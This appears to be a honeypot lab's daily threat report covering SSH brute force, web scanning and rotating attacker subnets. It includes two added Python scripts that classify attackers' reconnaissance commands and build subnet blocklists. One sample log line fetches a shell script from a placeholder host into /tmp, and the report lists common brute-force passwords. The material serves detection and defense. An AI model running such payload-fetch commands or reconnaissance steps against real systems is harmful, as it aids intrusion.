Honeypot Threat Analysis — April 29, 2026
Critical severity continues — 2,064 SSH connections with 359 commands. Galah web scanning resumes with 76 requests.
Threat Landscape Overview
Critical severity for the second consecutive day: 2,064 SSH connections (81 IPs), 662 OpenCanary events (17 IPs), and 76 Galah web requests (37 IPs). While OpenCanary volume dropped significantly from yesterday’s 7,919, SSH activity remained aggressively elevated with 2,906 login attempts.
SSH Brute Force Analysis
2,906 login attempts from 81 IPs produced 359 post-auth commands: attackers are getting past the honeypot's authentication and running commands in its emulated shell at scale. The 2,906-to-2,064 ratio (about 1.4 login attempts per connection) shows that many sessions cycle through more than one credential pair before disconnecting, the signature of scripted multi-credential attacks rather than manual logins.
Top passwords attempted: 123456, admin, 123, password, 1234. The top attacker, 45.156.87.254, operated from the same bulletproof hosting range as yesterday's 45.156.87.99, and 176.65.132.17 is another host in the persistent 176.65.x.x scanning network.
Post-auth commands included system fingerprinting (uname variants), shell testing (echo SHELL_TEST), process enumeration, and mount point scanning — the standard automated reconnaissance playbook.
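To turn that playbook into something a detection rule can act on, the following script classifies each post-auth command into the four reconnaissance categories named above and flags sessions that run most of the sequence. It is an added example, not code from this report or from any honeypot project: the newline-delimited JSON log format (fields session, src_ip, command) and the regexes are assumptions, and the sample log is constructed from the IPs and commands the report mentions plus a TEST-NET filler address.

```python
"""Classify post-authentication honeypot commands into reconnaissance categories.

Added example, not part of the original report or any honeypot project.
The log format below (one JSON object per line with session, src_ip and
command fields) is an assumption; real honeypots use their own schemas.
"""
import json
import re
from collections import defaultdict
from typing import Optional

# Category -> regex over one simple command. The categories mirror the recon
# steps in the report: fingerprinting, shell testing, process enumeration and
# mount-point scanning. Patterns are assumptions, tuned to the sample below.
RECON_PATTERNS = {
    "fingerprint": re.compile(r"^\s*(uname\b|cat\s+/proc/cpuinfo|lscpu\b|nproc\b)"),
    "shell_test": re.compile(r"^\s*echo\s+\S+"),
    "process_enum": re.compile(r"^\s*(ps\b|top\b|cat\s+/proc/\d+)"),
    "mount_scan": re.compile(r"^\s*(cat\s+/proc/mounts|mount\b|df\b|ls\s+/mnt)"),
}

# Constructed sample log: s1 runs the full playbook, s2 only fingerprints,
# s3 (TEST-NET address) goes straight to fetching a payload.
SAMPLE_LOG = """\
{"session": "s1", "src_ip": "45.156.87.254", "command": "uname -a"}
{"session": "s1", "src_ip": "45.156.87.254", "command": "echo SHELL_TEST"}
{"session": "s1", "src_ip": "45.156.87.254", "command": "ps aux"}
{"session": "s1", "src_ip": "45.156.87.254", "command": "cat /proc/mounts"}
{"session": "s2", "src_ip": "176.65.132.17", "command": "uname -s -v -n -r -m"}
{"session": "s2", "src_ip": "176.65.132.17", "command": "cat /proc/cpuinfo | grep name | wc -l"}
{"session": "s3", "src_ip": "203.0.113.9", "command": "cd /tmp; wget http://example.invalid/x.sh"}
"""


def classify(command: str) -> Optional[str]:
    """Return the recon category of a command line, or None if it matches nothing.

    Compound lines are split on ; && || | so that a pipeline such as
    "cat /proc/cpuinfo | grep name" is judged by its first simple command.
    """
    for part in re.split(r"\s*(?:;|&&|\|\||\|)\s*", command):
        for name, pattern in RECON_PATTERNS.items():
            if pattern.search(part):
                return name
    return None


def analyze(log_text: str) -> dict:
    """Group commands by session and record which recon categories each session ran."""
    sessions = defaultdict(lambda: {"src_ip": None, "categories": set(), "commands": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        s = sessions[event["session"]]
        s["src_ip"] = event["src_ip"]
        s["commands"] += 1
        category = classify(event["command"])
        if category:
            s["categories"].add(category)
    return dict(sessions)


def playbook_sessions(summary: dict, min_steps: int = 3) -> list:
    """Sessions that ran at least min_steps distinct recon categories.

    Three or more of the four steps in one session is a strong sign of a
    scripted bot rather than a human; the threshold is an assumption.
    """
    return sorted(sid for sid, s in summary.items() if len(s["categories"]) >= min_steps)


if __name__ == "__main__":
    summary = analyze(SAMPLE_LOG)
    for sid in playbook_sessions(summary):
        s = summary[sid]
        print(f"{sid} from {s['src_ip']}: {sorted(s['categories'])} in {s['commands']} commands")
```

Counting distinct categories per session rather than raw command volume is what separates a scripted reconnaissance pass from a session that merely runs a lot of commands; a session that only fingerprints (s2 above) is still worth logging but does not trip the playbook rule.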
Web Scanner Activity
Galah resumed operations with 76 requests from 37 IPs. Most requested paths: /sitemap.xml, /zc?action=getInfo, /login. Requests for /login suggest scanners are enumerating authentication endpoints as brute-force targets.
Notable Trends
The 45.156.87.x range has been active across multiple days with different final octets (.99, .254), suggesting a dedicated scanning operation rotating through a subnet allocation. The 176.65.x.x range shows similar rotation patterns. These are not individual attackers but organized scanning infrastructure.
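The rotation pattern is easy to miss when reports are read one day at a time, because each day shows a different single address. The script below groups attacker IPs by network prefix across days and reports prefixes that recur with different hosts. It is an added example, not part of the original report: the per-day lists are constructed from the 45.156.87.x addresses the report names plus TEST-NET filler, and the /24 grouping and two-day threshold are assumptions.

```python
"""Find attacker subnets that recur across days with different host addresses.

Added example, not part of the original report. The daily IP lists are
constructed (report-named addresses plus TEST-NET filler); the prefix
length and minimum-day threshold are assumptions.
"""
import ipaddress
from collections import defaultdict


def rotating_subnets(daily_ips: dict, prefix_len: int = 24, min_days: int = 2) -> dict:
    """Return {network: {day: [hosts]}} for networks seen on >= min_days days
    with at least two distinct host addresses overall.

    A prefix that repeats the *same* host every day is a persistent single
    attacker, not rotation, so it is excluded.
    """
    seen = defaultdict(lambda: defaultdict(set))  # network -> day -> hosts
    for day, ips in daily_ips.items():
        for ip in ips:
            addr = ipaddress.ip_address(ip)
            if addr.version != 4:
                continue  # sample data is IPv4 only; v6 would need its own prefix length
            net = ipaddress.ip_network(f"{addr}/{prefix_len}", strict=False)
            seen[net][day].add(str(addr))
    result = {}
    for net, days in seen.items():
        hosts = set().union(*days.values())
        if len(days) >= min_days and len(hosts) >= 2:
            result[str(net)] = {day: sorted(h) for day, h in sorted(days.items())}
    return result


def blocklist(rotation: dict) -> list:
    """CIDRs to feed a firewall or blocklist from the rotation result."""
    return sorted(rotation)


# Constructed daily attacker lists: the two 45.156.87.x hosts from the report,
# a rotating TEST-NET range, a TEST-NET host that repeats unchanged, and a
# single-day TEST-NET host.
SAMPLE_DAYS = {
    "2026-04-28": ["45.156.87.99", "198.51.100.7", "203.0.113.9"],
    "2026-04-29": ["45.156.87.254", "176.65.132.17", "198.51.100.23", "203.0.113.9", "192.0.2.1"],
}


if __name__ == "__main__":
    rotation = rotating_subnets(SAMPLE_DAYS)
    for net, days in rotation.items():
        print(net, {day: hosts for day, hosts in days.items()})
    print("block:", blocklist(rotation))
```

Blocking a whole /24 on the strength of two hosts is a judgement call: it is reasonable for a range the report already characterises as bulletproof hosting, but on shared cloud or ISP space the same rule would drop legitimate traffic, so keep the prefix length and day threshold as tunable inputs rather than constants.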
Community Defense
17 IPs reported to AbuseIPDB. All data shared with AlienVault OTX, Blocklist.de, and SANS DShield.
This analysis was generated for the Raspberry Pi 5 honeypot lab in Barcelona, Spain. View the raw data report for complete metrics.